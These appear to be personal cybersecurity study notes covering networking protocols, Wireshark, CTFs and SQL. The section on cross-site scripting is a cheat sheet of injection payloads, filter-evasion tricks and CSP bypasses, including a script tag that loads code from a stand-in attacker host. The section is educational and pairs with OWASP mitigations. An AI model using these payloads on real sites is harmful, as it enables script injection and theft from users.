The devices on your local home or office network each have a private IP address that they use to communicate directly with each other. However, in order for the devices with private IP addresses to communicate with the public internet, they need to have a single public IP address that represents all devices on the LAN to the public. For outgoing messages, the router can replace a private source IP address with its public IP address and perform the reverse operation for responses. This process is known as Network Address Translation (NAT) and it generally requires a router or firewall to be specifically configured to perform NAT. NAT is a part of layer 2 (internet layer) and layer 3 (transport layer) of the TCP/IP model.

|Private IP Addresses|Public IP Addresses| |---|---| |- Assigned by the router - Unique only within private network - No cost to use - Address ranges: - 10.0.0.0-10.255.255.255 - 172.16.0.0-172.31.255.255 - 192.168.0.0-192.168.255.255|- Assigned by ISP and IANA - Unique address in global internet - Costs to lease a public IP address - Assignable address ranges: - 1.0.0.0-9.255.255.255 - 11.0.0.0-126.255.255.255 - 128.0.0.0-172.15.255.255 - 172.32.0.0-192.167.255.255 - 192.169.0.0-233.255.255.255|

Dynamic Host Configuration Protocol

Dynamic Host Configuration Protocol (DHCP) is in the management family of network protocols. DHCP is an application layer protocol used on a network to configure devices. It works with the router to assign a unique IP address to each device and provide the addresses of the appropriate DNS server and default gateway for each device. DHCP servers operate on UDP port 67 while DHCP clients operate on UDP port 68.

When a device connects to a network, if it has not already been manually assigned an IP address, it sends out a request (DHCP Discover) to see if any DHCP servers are on the network. The DHCP server then replies back with an IP address the device could use (DHCP Offer). The device then sends a reply confirming it wants the offered IP Address (DHCP Request), and then lastly, the DHCP server sends a reply acknowledging this has been completed, and the device can start using the IP Address (DHCP ACK).

Address Resolution Protocol ([[ARP]])

By now, you are familiar with IP and MAC addresses. You’ve learned that each device on a network has a public IP address, a private IP address, and a MAC address that identify it on the network. A device’s IP address may change over time, but its MAC address is permanent because it is unique to a device's network interface card. The MAC address is used to communicate with devices within the same network, but sometimes, the MAC address is unknown. This is why the Address Resolution Protocol (ARP) is needed. ARP is mainly a network access layer protocol in the TCP/IP model used to translate the IP addresses that are found in data packets into the MAC address of the hardware device. Each device on the network performs ARP and keeps track of matching IP and MAC addresses in an ARP cache. ARP does not have a specific port number since it is a layer 2 protocol and port numbers are associated with the layer 7 application layer.

ARP is used to determine the MAC address of the next router or device on the path.

Telnet

Telnet is an application layer protocol that is used to connect with a remote system. Telnet sends all information in clear text. It uses command line prompts to control another device similar to secure shell (SSH), but Telnet is not as secure as SSH. Telnet can be used to connect to local or remote devices and uses TCP port 23.

Secure shell

Secure shell protocol (SSH) is used to create a secure connection with a remote system. This application layer protocol provides an alternative for secure authentication and encrypted communication. SSH operates over the TCP port 22 and is a replacement for less secure protocols, such as Telnet.

Post office protocol

Post office protocol (POP) is an application layer (layer 4 of the TCP/IP model) protocol used to manage and retrieve email from a mail server. POP3 is the most commonly used version of POP. Many organizations have a dedicated mail server on the network that handles incoming and outgoing mail for users on the network. User devices will send requests to the remote mail server and download email messages locally. If you have ever refreshed your email application and had new emails populate in your inbox, you are experiencing POP and internet message access protocol (IMAP) in action. Unencrypted, plaintext authentication uses TCP/UDP port 110 and encrypted emails use Secure Sockets Layer/Transport Layer Security (SSL/TLS) over TCP/UDP port 995. When using POP, mail has to finish downloading on a local device before it can be read. After downloading, the mail may or may not be deleted from the mail server, so it does not guarantee that a user can sync the same email across multiple devices.

Internet Message Access Protocol (IMAP)

IMAP is used for incoming email. It downloads the headers of emails and the message content. The content also remains on the email server, which allows users to access their email from multiple devices. IMAP uses TCP port 143 for unencrypted email and TCP port 993 over the TLS protocol. Using IMAP allows users to partially read email before it is finished downloading. Since the mail is kept on the mail server, it allows a user to sync emails across multiple devices.

Simple Mail Transfer Protocol

Simple Mail Transfer Protocol (SMTP) is used to transmit and route email from the sender to the recipient’s address. SMTP works with Message Transfer Agent (MTA) software, which searches DNS servers to resolve email addresses to IP addresses, to ensure emails reach their intended destination. SMTP uses TCP/UDP port 25 for unencrypted emails and TCP/UDP port 587 using TLS for encrypted emails. The TCP port 25 is often used by high-volume spam. SMTP helps to filter out spam by regulating how many emails a source can send at a time.

Protocols and port numbers

Remember that port numbers are used by network devices to determine what should be done with the information contained in each data packet once they reach their destination. Firewalls can filter out unwanted traffic based on port numbers. For example, an organization may configure a firewall to only allow access to TCP port 995 (POP3) by IP addresses belonging to the organization. As a security analyst, you will need to know about many of the protocols and port numbers mentioned in this course. They may be used to determine your technical knowledge in interviews, so it’s a good idea to memorize them. You will also learn about new protocols on the job in a security position.

|Protocol|Port| |---|---| |DHCP|UDP port 67 (servers)UDP port 68 (clients)| |ARP|none| |Telnet|TCP port 23| |SSH|TCP port 22| |POP3|TCP/UDP port 110 (unencrypted)TCP/UDP port 995 (encrypted, SSL/TLS)| |IMAP|TCP port 143 (unencrypted)TCP port 993 (encrypted, SSL/TLS)| |SMTP|TCP/UDP Port 25 (unencrypted)| |SMTPS|TCP/UDP port 587 (encrypted, TLS)|

Every network protocol in 3 min : https://www.youtube.com/watch?v=q0S_NRq6BVc
Networking for hackers : https://www.youtube.com/watch?v=p3vaaD9pn9I

[Vault: Networking] Packet Analysis

Mon, 08 Dec 2025 11:35:56 GMT

Packet

Data packet is a basic unit of information that travels from one device to another within a network.

Packets contain three components: the header, the payload, and the footer. Here’s a description of each of these components.

Header

Packets begin with the most essential component: the header. Packets can have several headers depending on the protocols used such as an Ethernet header, an IP header, a TCP header, and more. Headers provide information that’s used to route packets to their destination. This includes information about the source and destination IP addresses, packet length, protocol, packet identification numbers, and more.

Here is an IPv4 header with the information it provides: ![[attachments/Packet-Analysis-img-202512081231.png|An IPv4 header with its thirteen fields|899x505]]

Payload

The payload component directly follows the header and contains the actual data being delivered. Think back to the example of uploading an image to a website; the payload of this packet would be the image itself.

Footer

The footer, also known as the trailer, is located at the end of a packet. The Ethernet protocol uses footers to provide error-checking information to determine if data has been corrupted. In addition, Ethernet network packets that are analyzed might not display footer information due to network configurations.

Note: Most protocols, such as the Internet Protocol (IP), do not use footers.

Network protocol analyzers

Network protocol analyzers (packet sniffers) are tools designed to capture and analyze data traffic within a network. Examples of network protocol analyzers include tcpdump, Wireshark, and TShark.

Beyond their use in security as an investigative tool used to monitor networks and identify suspicious activity, network protocol analyzers can be used to collect network statistics, such as bandwidth or speed, and troubleshoot network performance issues, like slowdowns.

Network protocol analyzers can also be used for malicious purposes. For example, malicious actors can use network protocol analyzers to capture packets containing sensitive data, such as account login information.

How network protocol analyzers work

Network protocol analyzers use both software and hardware capabilities to capture network traffic and display it for security analysts to examine and analyze. Here’s how:

First, packets must be collected from the network via the Network Interface Card (NIC), which is hardware that connects computers to a network, like a router. NICs receive and transmit network traffic, but by default they only listen to network traffic that’s addressed to them. To capture all network traffic that is sent over the network, a NIC must be switched to a mode that has access to all visible network data packets. In wireless interfaces this is often referred to as monitoring mode, and in other systems it may be called promiscuous mode. This mode enables the NIC to have access to all visible network data packets, but it won’t help analysts access all packets across a network. A network protocol analyzer must be positioned in an appropriate network segment to access all traffic between different hosts.
The network protocol analyzer collects the network traffic in raw binary format. Binary format consists of 0s and 1s and is not as easy for humans to interpret. The network protocol analyzer takes the binary and converts it so that it’s displayed in a human-readable format, so analysts can easily read and understand the information.

Note: Enabling promiscuous can expose your device to potential attacks because it allows sensitive information like passwords and other confidential data to be captured. It's important to use tools that operate in promiscuous mode responsibly and with caution.

Capturing packets

Packet sniffing is the practice of capturing and inspecting data packets across a network. A packet capture (p-cap) is a file containing data packets intercepted from an interface or network. Packet captures can be viewed and further analyzed using network protocol analyzers. For example, you can filter packet captures to only display information that's most relevant to your investigation, such as packets sent from a specific IP address.

Note: Using network protocol analyzers to intercept and examine private network communications without permission is considered illegal in many places.

P-cap files can come in many formats depending on the packet capture library that’s used. Each format has different uses and network tools may use or support specific packet capture file formats by default. You should be familiar with the following libraries and formats:

Libpcap is a packet capture library designed to be used by Unix-like systems, like Linux and MacOS®. Tools like tcpdump use Libpcap as the default packet capture file format.
WinPcap is an open-source packet capture library designed for devices running Windows operating systems. It’s considered an older file format and isn’t predominantly used.
Npcap is a library designed by the port scanning tool Nmap that is commonly used in Windows operating systems.
PCAPng is a modern file format that can simultaneously capture packets and store data. Its ability to do both explains the “ng,” which stands for “next generation.”
SolarWinds NetFlow Traffic Analyzer
ManageEngine OpManager
Azure Network Watcher

Tools: [[tcpdump]], [[Wireshark]]

[Vault: Networking] TCP IP Model

Mon, 08 Dec 2025 11:35:56 GMT

TCP/IP Model

Transmission Control Protocol and Internet Protocol (TCP/IP) is the standard model used for network communication. TCP, or Transmission Control Protocol, is an internet communication protocol that allows two devices to form a connection and stream data.

The protocol includes a set of instructions to organize data, so it can be sent across a network.
It also establishes a connection between two devices and makes sure that packets reach their appropriate destination. The IP in TCP/IP stands for [[Internet Protocol (IP)]] .
IP has a set of standards used for routing and addressing data packets as they travel between devices on a network. Included in the Internet Protocol (IP) is the IP address that functions as an address for each private network.
Port: Within the operating system of a network device, a port is a software-based location that organizes the sending and receiving of data between devices on a network. The TCP/IP model is a framework that is used to visualize how data is organized and transmitted across the network. 4 layers

Network access layer: deals with creation of data packets and their transmission across a network. This includes hardware devices connected to physical cables and switches that direct data to its destination.
Internet layer: The internet layer is where IP addresses are attached to data packets to indicate the location of the sender and receiver. The internet layer also focuses on how networks connect to each other.
Transport layer: includes protocols to control the flow of traffic across a network. These protocols permit or deny communication with other devices and include information about the status of the connection. Activities of this layer include error control, which ensures data is flowing smoothly across the network.
Application layer: protocols determine how the data packets will interact with receiving devices. Functions that are organized at application layer include file transfers and email services.

[!important] [[OSI Model]] [[IP and MAC Addresses]]

![[attachments/TCP-IP-Model-IMG-20260131121101584.png]]

Network access layer

The network access layer, sometimes called the data link layer, deals with the creation of data packets and their transmission across a network. This layer corresponds to the physical hardware involved in network transmission. Hubs, modems, cables, and wiring are all considered part of this layer. The address resolution protocol (ARP) is part of the network access layer. Since MAC addresses are used to identify hosts on the same physical network, ARP is needed to map IP addresses to MAC addresses for local network communication.

Internet layer

The internet layer, sometimes referred to as the network layer, is responsible for ensuring the delivery to the destination host, which potentially resides on a different network. It ensures IP addresses are attached to data packets to indicate the location of the sender and receiver. The internet layer also determines which protocol is responsible for delivering the data packets and ensures the delivery to the destination host. Here are some of the common protocols that operate at the internet layer:

Internet Protocol (IP). IP sends the data packets to the correct destination and relies on the Transmission Control Protocol/User Datagram Protocol (TCP/UDP) to deliver them to the corresponding service. IP packets allow communication between two networks. They are routed from the sending network to the receiving network. TCP in particular retransmits any data that is lost or corrupt.
Internet Control Message Protocol (ICMP). The ICMP shares error information and status updates of data packets. This is useful for detecting and troubleshooting network errors. The ICMP reports information about packets that were dropped or that disappeared in transit, issues with network connectivity, and packets redirected to other routers.

Transport layer

The transport layer is responsible for delivering data between two systems or networks and includes protocols to control the flow of traffic across a network. TCP and UDP are the two transport protocols that occur at this layer.

Transmission Control Protocol

The Transmission Control Protocol (TCP) is an internet communication protocol that allows two devices to form a connection and stream data. It ensures that data is reliably transmitted to the destination service. TCP contains the port number of the intended destination service, which resides in the TCP header of a TCP/IP packet.

User Datagram Protocol

The User Datagram Protocol (UDP) is a connectionless protocol that does not establish a connection between devices before transmissions. It is used by applications that are not concerned with the reliability of the transmission. Data sent over UDP is not tracked as extensively as data sent using TCP. Because UDP does not establish network connections, it is used mostly for performance sensitive applications that operate in real time, such as video streaming.

Application layer

The application layer in the TCP/IP model is similar to the application, presentation, and session layers of the OSI model. The application layer is responsible for making network requests or responding to requests. This layer defines which internet services and applications any user can access. Protocols in the application layer determine how the data packets will interact with receiving devices. Some common protocols used on this layer are:

Hypertext transfer protocol (HTTP)
Simple mail transfer protocol (SMTP)
Secure shell (SSH)
File transfer protocol (FTP)
Domain name system (DNS) Application layer protocols rely on underlying layers to transfer the data across the network.

TCP/IP model versus OSI model

![[attachments/TCP-IP-Model-IMG-20260131121101859.png]]

The OSI visually organizes network protocols into different layers. Network professionals often use this model to communicate with each other about potential sources of problems or security threats when they occur.

The TCP/IP model combines multiple layers of the OSI model. There are many similarities between the two models. Both models define standards for networking and divide the network communication process into different layers. The TCP/IP model is a simplified version of the OSI model. ![[attachments/TCP-IP-Model-IMG-20260131121101974.png|798x449]]

![[attachments/TCP-IP-Model-IMG-20260131121102071.png|797x448]]

https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers

[Vault: Tools] Wireshark

Mon, 08 Dec 2025 11:35:56 GMT

Wireshark is an open-source network protocol analyzer. It uses a graphical user interface (GUI), which makes it easier to visualize network communications for packet analysis purposes.

Wireshark can analyze traffic and display the information in an easy-to-navigate format regardless of the protocols used (e.g., HTTP, TCP, DNS).
Wireshark can reconstruct back-and-forth conversations in a network.
Wireshark allows easy filtering to narrow down essential details.
Wireshark can also export and analyze objects that are transferred over the network.

Display filters

Wireshark's display filters let you apply filters to packet capture files. This is helpful when you are inspecting packet captures with large volumes of information. Display filters will help you find specific information that's most relevant to your investigation. You can filter packets based on information such as protocols, IP addresses, ports, and virtually any other property found in a packet.

You can apply filters to a packet capture using Wireshark's filter toolbar.

Comparison operators You can use different comparison operators to locate specific header fields and values. Comparison operators can be expressed using either abbreviations or symbols. For example, this filter using the == equal symbol in this filter ip.src == 8.8.8.8 is identical to using the eq abbreviation in this filter ip.src eq 8.8.8.8. This table summarizes the different types of comparison operators you can use for display filtering.

| Operator type | Symbol | Abbreviation | | ------------------------ | ---------- | ---------------- | | Equal | == | eq | | Not equal | != | ne | | Greater than | > | gt | | Less than | < | lt | | Greater than or equal to | >= | ge | | Less than or equal to | <= | le |

You can combine comparison operators with Boolean logical operators like and and or to create complex display filters. Parentheses can also be used to group expressions and to prioritize search terms. Contains operator The contains operator is used to filter packets that contain an exact match of a string of text. Matches operator The matches operator is used to filter packets based on the regular expression (regex) that's specified. Regular expression is a sequence of characters that forms a pattern.

Filter for protocols

Protocol filtering is one of the simplest ways you can use display filters. You can simply enter the name of the protocol to filter. For example, to filter for DNS packets simply type dns in the filter toolbar. Some protocols you can filter for:dns, http, ftp, ssh, arp, telnet, icmp

Filter for an IP address

You can use display filters to locate packets with a specific IP address.

If you would like to filter packets that contain a specific IP address use ip.addr, followed by a space, the equal == comparison operator, and the IP address. eg: ip.addr == 172.21.224.2
To filter for packets originating from a specific source IP address, you can use the ip.src filter. eg: ip.src == 10.10.10.10
To filter for packets delivered to a specific destination IP address, you can use the ip.dst filter. eg: ip.dst == 4.4.4.4

Filter for a MAC address

You can also filter packets according to the Media Access Control (MAC) address. eg: eth.addr == 00:70:f4:23:18:c4

Filter for ports

Port filtering is used to filter packets based on port numbers. This is helpful when you want to isolate specific types of traffic. DNS traffic uses TCP or UDP port 53 so this will list traffic related to DNS queries and responses only.

For example, if you would like to filter for a UDP port: udp.port == 53 Likewise, you can filter for TCP ports as well: tcp.port == 25

Follow streams

Wireshark provides a feature that lets you filter for packets specific to a protocol and view streams. A stream or conversation is the exchange of data between devices using a protocol. Wireshark reassembles the data that was transferred in the stream in a way that's simple to read. Following a protocol stream is useful when trying to understand the details of a conversation. For example, you can examine the details of an HTTP conversation to view the content of the exchanged request and response messages.

Coloring rules are used to provide high-level visual cues to help you quickly classify the different types of data. DNS : light blue TCP HTTP : light green

Sections in a packet

Frame This provides you with details about the overall network packet, or frame, including the frame length and the arrival time of the packet. At this level, you’re viewing information about the entire packet of data. Ethernet II This item contains details about the packet at the Ethernet level, including the source and destination MAC addresses and the type of internal protocol that the Ethernet packet contains. IPv4 This provides packet data about the Internet Protocol (IP) data contained in the Ethernet packet. It contains information such as the source and destination IP addresses and the Internal Protocol (for example, TCP or UDP), which is carried inside the IP packet. TCP This provides detailed information about the TCP packet, including the source and destination TCP ports, the TCP sequence numbers, and the TCP flags.

Resources

[Vault: Vulns & Attacks] XSS - Cross-Site Scripting

Mon, 08 Dec 2025 11:35:56 GMT

Cross-Site Scripting

Cross-Site Scripting (XSS) is a security vulnerability that allows attackers to inject client-side scripts into web pages viewed by other users. These injected scripts can be malicious and can be used to steal sensitive information, modify page content, or redirect users to malicious websites. XSS attacks often occur when a web application doesn't properly sanitize user input before displaying it on a web page.

How XSS Works:

Injection: An attacker injects malicious script code into a web application, typically through user input fields or as part of a URL.
Inclusion: The web application, without proper sanitization, includes this malicious script code in the HTML response sent to the browser.
Execution: When the victim's browser loads the page containing the malicious script, the script is executed in the context of the trusted website, allowing the attacker to potentially steal information or manipulate the page. Injecting scripts for XSS (Cross-Site Scripting) involves exploiting points where user input is improperly handled and rendered into HTML, JavaScript, or the DOM. Below are various ways attackers inject scripts, categorized by context.

Types of XSS:

Reflected XSS

Reflected XSS attacks (that is, non-persistent XSS attacks) occur when malicious code or scripts are injected by a vulnerable web application using any method that yields a response as part of a valid HTTP request.
An example of a reflected XSS attack is a user being persuaded to follow a malicious link to a vulnerable server that injects (reflects) the malicious code back to the user’s browser. This causes the browser to execute the code or script. In this case, the vulnerable server is usually a known or trusted site.

Stored (persistent) XSS

Stored, or persistent, XSS attacks occur when malicious code or script is permanently stored on a vulnerable or malicious server, using a database. These attacks are typically carried out on websites hosting blog posts (comment forms), web forums, and other permanent storage methods.
An example of a stored XSS attack is a user requesting the stored information from the vulnerable or malicious server, which causes the injection of the requested malicious script into the victim’s browser. In this type of attack, the vulnerable server is usually a known or trusted site.

DOM-based XSS:

The vulnerability lies in the client-side code (Document Object Model), allowing the attacker to manipulate the page's content or functionality.
The Document Object Model (DOM) is a cross-platform and language-independent application programming interface that treats an HTML, XHTML, or XML document as a tree structure.
In DOM-based XSS attacks, the payload is never sent to the server. Instead, the payload is only processed by the web client (browser).
In a DOM-based XSS attack, the attacker sends a malicious URL to the victim, and after the victim clicks on the link, the attacker may load a malicious website or a site that has a vulnerable DOM route handler. After the vulnerable site is rendered by the browser, the payload executes the attack in the user’s context on that site.

Blind XSS

The attacker's payload is stored on the server and executed when a different user visits the affected page. Unlike reflected or stored XSS, the attacker doesn't immediately see the result of their injected code. Instead, the malicious script lies dormant until triggered by a user accessing the compromised functionality. This often occurs in applications where user input is stored and later displayed to administrators or other users in a different part of the application.

Use XSS Hunter - https://xsshunter.trufflesecurity.com/app/#/
Add payloads in http header using proxy tools. Admin tools may display header information which we can exploit this way.

Script Injection Techniques

1. Basic Script Tag (HTML Context)

<script>alert('XSS')</script>
<script SRC=http://hacker.org/xss.js></script>

Works when input is directly placed inside the HTML body without escaping.

Context: HTML

<div>Hello, USER_INPUT</div>  
<!-- Payload -->  
<script>alert(1)</script>

Broken HTML Technique:
- Injecting unclosed or malformed tags to break HTML structure:
```
"><script>alert(1)</script>
```

2. Event Handlers (Attribute Context)

Injected via HTML tag attributes using event handlers like onerror, onclick, onmouseover.

<img src="x" onerror="alert('XSS')">
<a href="#" onclick="alert('XSS')">Click me</a>
<div onmouseover="alert('XSS')">Hover me</div>
<input value="X" onfocus="alert(1)">

Context: Attribute

<img src="USER_INPUT">  
<!-- Payload -->  
" onerror="alert(1)
x" onmouseover=alert(1);//

The // comments out the rest of the attribute to prevent syntax errors.

No <script> Required (Inline Event Examples):

<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>

3. JavaScript URI Injection (URL Context)

Used when input is reflected in href, src, or similar attributes.

<a href="javascript:alert('XSS')">Click</a>
<iframe src="javascript:alert('XSS')"></iframe>
<img src="javascript:alert('xss');">

Object or Script Tag Payloads:

<object data="data:text/html,<script>alert(1)</script>"></object>
<script src="data:text/javascript,alert(1)"></script>

Context: URL

<a href="USER_INPUT">Click</a>
<!-- Payload -->  
javascript:alert(1)

4. DOM-Based XSS (DOM Context)

Occurs on the client side when input is processed via JavaScript without sanitization.

document.body.innerHTML = location.hash;

Injection Example (via URL):

https://example.com/#<script>alert(1)</script>

5. Malicious CSS (CSS Context)

Rare and mostly works in older browsers (like legacy IE).

<div style="background-image: url(javascript:alert(1))">

Context: CSS

<style>body { background: USER_INPUT; }</style>
<!-- Payload -->  
url("javascript:alert(1)")

6. Base64 / Obfuscated Payloads (Data URI Context)

Used to bypass filters or input sanitizers.

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>

Also in:

<object data="data:text/html,<script>alert(1)</script>"></object>

7. SVG / MathML / Other Scripting Tags

Certain tags support inline scripts or JS events.

<svg onload="alert(1)"></svg>
<math href="javascript:alert(1)"></math>

Using the HTML embed tags to embed a Scalable Vector Graphics (SVG) file:

<EMBED
SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" 
AllowScriptAccess="always"></EMBED>

8. JavaScript Injection (Script Context)

When input is inserted into a <script> block.

<script>var name = "USER_INPUT";</script>  
<!-- Payload -->  
"; alert(1); var x = "

Exploitable when inputs are not escaped within JS strings or logic.

9. Template Engine Injection (Template Context)

Occurs when using template engines like EJS, Handlebars, etc., that fail to escape user input.

{{userInput}}  
<!-- Payload -->  
<script>alert(1)</script>

Advanced Filter Bypass Techniques

| Technique | Example | | ------------------- | --------------------------------------- | | Unicode encoding | <scr\u0069pt>alert(1)</scr\u0069pt> | | HTML Entities | <script>alert(1)</script> | | JS Backticks / Eval | evalalert(1) | | Nested Tags | <script><script>alert(1)</script> | | Null Bytes | "><script>alert(1)</script>\0 | | US ASCII encoding | ¼script¾alert(¢XSS¢)¼/script¾ |

Injection Entry Points

Search boxes
Profile bios/comments
URL parameters (?name=)
Form fields
Cookies/localStorag
AJAX/JSON data
Hash/fragments in URLs
File uploads (e.g., uploading HTML files)

Markdown

Varies on how markdown is parsed. Commonly exploits hyperlinks by adding a js object as link:

[[javascript:alert``|link]]

Sometimes the 'javascript' string will be filtered or removed. so we need to implement ways to evade it, by fuzzing or using images etc.

![["onerror="alert(1|image]])

Filter Evasion

common filtering based on

Script Tags case sensitivity
Script Tags second occurrence
Script Tags : use other tags along with event handlers
Tag On Attributes : use iframes/script/a tags
All Tags : Try without closing the tags or trick the filtering like: <scr<script>ipt>alert(1)</scr</script>ipt>

CSP Bypass

CSP eg:
Header: Content-Security-Policy: default-src 'self'; script-src 'self' ; img-src 'self' https://example.com;

[[CSP - Content Security Policy]]
Hacktricks CSP bypass
data:

content-security-policy: script-src 'self' https://app.hackinghub.io data:
Bypass: 
<script src=data:javascript,alert(1)></script>

exploit [[JSONP]] with 3rd party domains we can exploit callback functions that may be present in 3rd party urls.
- https://www.youtube.com/oembed?url=&callback=alert(1)
- https:accounts.google.com/o/oauth2/revoke?callback=alert(1)
- oauth implementations will usually have a callback function which we can exploit

content-security-policy: script-src 'self' https://app.hackinghub.io https://www.google.com https://www.youtube.com

Bypass:
<script src=https://www.youtube.com/oembed?url=https://www.youtube.com/watch?v=TTw-EY7F1rM&callback=alert(1)></script>

Find ways exploit upload file functionality to upload scripts and source them in script to bypass CSP.

Tips

Use alert(document.domain) instead of alert(1). source: Google bug hunters
Assume that you will be inside a tag, so include closing tags when testing XSS(especially blind XSS).
The OWASP XSS Filter Evasion Cheat Sheet includes dozens of additional examples of evasion techniques.
https://github.com/The-Art-of-Hacking/h4cker/blob/master/web_application_testing/xss_vectors.md

XSS Mitigations

The following are general rules for preventing XSS attacks, according to OWASP:

Use an auto-escaping template system.
Never insert untrusted data except in allowed locations.
Use HTML escape before inserting untrusted data into HTML element content.
Use attribute escape before inserting untrusted data into HTML common attributes.
Use JavaScript escape before inserting untrusted data into JavaScript data values.
Use CSS escape and strictly validate before inserting untrusted data into HTML-style property values.
Use URL escape before inserting untrusted data into HTML URL parameter values.
Sanitize HTML markup with a library such as ESAPI to protect the underlying application.
Prevent DOM-based XSS by following OWASP’s recommendations at https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html.
Use the HTTPOnly cookie flag.
Implement content security policy.
Use the X-XSS-Protection response header.

You should also convert untrusted input into a safe form, where the input is displayed as data to the user. This prevents the input from executing as code in the browser. To do this, perform the following HTML entity encoding:

Convert & to &
Convert < to <
Convert > to >
Convert “ to "
Convert “ to '
Convert / to /

The following are additional best practices for preventing XSS attacks:

Escape all characters (including spaces but excluding alphanumeric characters) with the HTML entity &#xHH; format (where HH is a hex value).
Use URL encoding only, not the entire URL or path fragments of a URL, to encode parameter values.
Escape all characters (except for alphanumeric characters), with the \uXXXX Unicode escaping format (where X is an integer).- CSS escaping supports \XX and \XXXXXX, so add a space after the CSS escape or use the full amount of CSS escaping possible by zero-padding the value.
Educate users about safe browsing to reduce their risk of falling victim to XSS attacks.

XSS controls are now available in modern web browsers.

NOTE One of the best resources that lists several mitigations against XSS attacks and vulnerabilities is the OWASP Cross-Site Scripting Prevention Cheat Sheet, available at https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html.

[Vault: Root] CTF

Mon, 08 Dec 2025 08:56:33 GMT

CTFs (short for capture the flag) are a type of computer security competition. Contestants are presented with a set of challenges which test their creativity, technical (and googling) skills, and problem-solving ability. Challenges usually cover a number of categories, and when solved, each yields a string (called a flag) which is submitted to an online scoring service. CTFs are a great way to learn a wide array of computer security skills in a safe, legal environment, and are hosted and played by many security groups around the world for fun and practice.

There are a wide range of skills tested by CTFs, but usually challenges are categorized as one of these problem types.

General Skills
- Scripting - [[Shell Commands]]
- Operating System Specific
- System Administration
[[CTF Cryptography]]
Forensics
- File
- Filesystem
- Memory
- Network
Web Exploitation
Reverse Engineering
Binary Exploitation

Some helpful tools for ctfs

cyberchef

try otw bandit :14

[Vault: Languages] SQL

Mon, 08 Dec 2025 08:56:33 GMT

Database

An organized collection of information or data. • Accessed by multiple people simultaneously • Store massive amounts of data • Perform complex tasks while accessing data

Relational database

A structured database containing tables that are related to each other. Each table contains fields of information. These are the columns of the tables. In addition, tables contain rows also called records. Rows are filled with specific data related to the columns in the table. Relational databases often have multiple tables. We can connect two tables if they share a common column. The columns that relate two tables to each other are called keys. There are two types of keys. The first is called a primary key. The primary key refers to a column where every row has a unique entry. The primary key must not have any duplicate values, or any null or empty values. The primary key allows us to uniquely identify every row in our table. The second type of key is a foreign key. The foreign key is a column in a table that is a primary key in another table. Foreign keys, unlike primary keys, can have empty values and duplicates. The foreign key allows us to connect two tables together.

SQL (Structured Query Language)

SQL is a programming language used to create, interact with, and request information from a database. A query is a request for data from a database table or a combination of tables. Nearly all relational databases rely on some version of SQL to query data. The different versions of SQL only have slight differences in their structure, like where to place quotation marks. A log is a record of events that occur within an organization's systems.Security logs are often very large and hard to process. There are millions of data points, and it's very time consuming to find what you need. SQL can search through millions of data points to extract relevant rows of data using one query that takes seconds to run.

Accessing SQL

There are many interfaces for accessing SQL and many different versions of SQL. One way to access SQL is through the Linux command line. To access SQL from Linux, you need to type in a command for the version of SQL that you want to use. For example, if you want to access SQLite, you can enter the command sqlite3 in the command line.

Differences between Linux and SQL filtering

Purpose

Linux filters data in the context of files and directories on a computer system. It’s used for tasks like searching for specific files, manipulating file permissions, or managing processes. SQL is used to filter data within a database management system. It’s used for querying and manipulating data stored in tables and retrieving specific information based on defined criteria.

Syntax

Linux uses various commands and command-line options specific to each filtering tool. Syntax varies depending on the tool and purpose. Some examples of Linux commands are find, sed, cut, e grep SQL uses the Structured Query Language (SQL), a standardized language with specific keywords and clauses for filtering data across different SQL databases. Some examples of SQL keywords and clauses are WHERE, SELECT, JOIN

Structure

SQL offers a lot more structure than Linux, which is more free-form and not as tidy. In terms of structure, SQL provides results that are more easily readable and that can be adjusted more quickly than when using Linux.

Joining tables

Some security-related decisions require information from different tables. SQL allows the analyst to join multiple tables together when returning data. Linux doesn’t have that same functionality; it doesn’t allow data to be connected to other information on your computer. This is more restrictive for an analyst going through security logs.

Best uses

As a security analyst, it’s important to understand when you can use which tool. Although SQL has a more organized structure and allows you to join tables, this doesn’t mean that there aren’t situations that would require you to filter data in Linux. A lot of data used in cybersecurity will be stored in a database format that works with SQL. However, other logs might be in a format that is not compatible with SQL. For instance, if the data is stored in a text file, you cannot search through it with SQL. In those cases, it is useful to know how to filter in Linux.

Basic SQL query

There are two essential keywords in any SQL query: SELECT and FROM. You will use these keywords every time you want to query a SQL database. Using them together helps SQL identify what data you need from a database and the table you are returning it from.

SELECT customerid, city, country
FROM customers;

The following are some of the most common SQL statements (commands):

SELECT: Used to obtain data from a database
UPDATE: Used to update data in a database
DELETE: Used to delete data from a database
INSERT INTO: Used to insert new data into a database
CREATE DATABASE: Used to create a new database
ALTER DATABASE: Used to modify a database
CREATE TABLE: Used to create a new table
ALTER TABLE: Used to modify a table
DROP TABLE: Used to delete a table
CREATE INDEX: Used to create an index or a search key element
DROP INDEX: Used to delete an index

SELECT

The SELECT keyword indicates which columns to return. You can also select multiple columns by separating them with a comma. If you want to return all columns in a table, you can follow the SELECT keyword with an asterisk (* ). The first line in the query will be SELECT *.

FROM

The SELECT keyword always comes with the FROM keyword. FROM indicates which table to query. To use the FROM keyword, you should write it after the SELECT keyword, often on a new line, and follow it with the name of the table you’re querying.

ORDER BY

Database tables are often very complicated, and this is where other SQL keywords come in handy. ORDER BY is an important keyword for organizing the data you extract from a table. ORDER BY sequences the records returned by a query based on a specified column or columns. This can be in either ascending or descending order.

Sorting in ascending order

To use the ORDER BY keyword, write it at the end of the query and specify a column to base the sort on. The ORDER BY keyword sorts the records based on the column specified after this keyword. By default the sequence will be in ascending order. This means

if you choose a column containing numeric data, it sorts the output from the smallest to largest.
